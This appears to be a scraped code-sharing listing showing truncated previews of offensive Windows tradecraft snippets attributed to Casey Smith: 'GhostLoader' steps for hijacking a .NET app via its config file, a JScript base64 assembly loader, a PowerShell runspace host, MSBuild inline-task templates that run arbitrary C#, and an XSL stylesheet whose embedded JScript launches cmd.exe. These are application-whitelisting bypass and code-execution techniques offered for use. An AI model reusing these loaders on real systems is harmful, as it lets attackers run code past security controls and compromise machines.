GhostLoader Steps :)
1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
[JS File] | |
function setversion() { | |
} | |
function debug(s) {} | |
function base64ToStream(b) { | |
var enc = new ActiveXObject("System.Text.ASCIIEncoding"); | |
var length = enc.GetByteCount_2(b); | |
var ba = enc.GetBytes_4(b); |
#r @"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" | |
open System.Management.Automation | |
open System.Management.Automation.Runspaces | |
open System | |
let runSpace = RunspaceFactory.CreateRunspace() | |
runSpace.Open() | |
let pipeline = runSpace.CreatePipeline() |
GhostLoader Steps :)
1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" > | |
<Target Name="Hello" > | |
<!-- Call ANY .NET API --> | |
<!-- | |
Author: Casey Smith, Twitter: @subTee | |
License: BSD 3-Clause | |
using System; | |
using System.Net; | |
using System.Diagnostics; | |
using System.Reflection; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
/* | |
Author: Casey Smith, Twitter: @subTee | |
License: BSD 3-Clause |
041e868e-0c7d-48c6-965f-5fd576530e5b | |
0438c02b-eb9c-4e42-81ad-407f6cd6cde1 | |
078b1f7d-c34c-4b13-a7c3-9663901650f1 | |
0abb2961-2cc1-4f1d-be8e-9d330d06b77d | |
0d7237e6-930f-4682-ad0a-52ebffd3aee3 | |
0d972387-817b-46e7-913f-e9993ff401eb | |
0e770b12-7221-4a5d-86ee-77310a5506bb | |
0fa57208-5100-4cd6-955c-fe69f8898973 | |
1080a020-2b47-4da9-8095-dbc9cefffc04 | |
10cf2e12-1681-4c53-adc0-932c84832cd8 |
<?xml version='1.0'?> | |
<stylesheet | |
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" | |
xmlns:user="placeholder" | |
version="1.0"> | |
<output method="text"/> | |
<ms:script implements-prefix="user" language="JScript"> | |
<![CDATA[ | |
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe"); | |
]]> </ms:script> |
using System; | |
using System.Diagnostics; | |
using System.Runtime.InteropServices; | |
using System.Text; | |
public class TestClass | |
{ | |
public TestClass() | |
{} |
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<!-- This inline task executes c# code. --> | |
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe powaShell.csproj --> | |
<Target Name="Hello"> | |
<ClassExample /> | |
</Target> | |
<UsingTask | |
TaskName="ClassExample" | |
TaskFactory="CodeTaskFactory" | |
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > |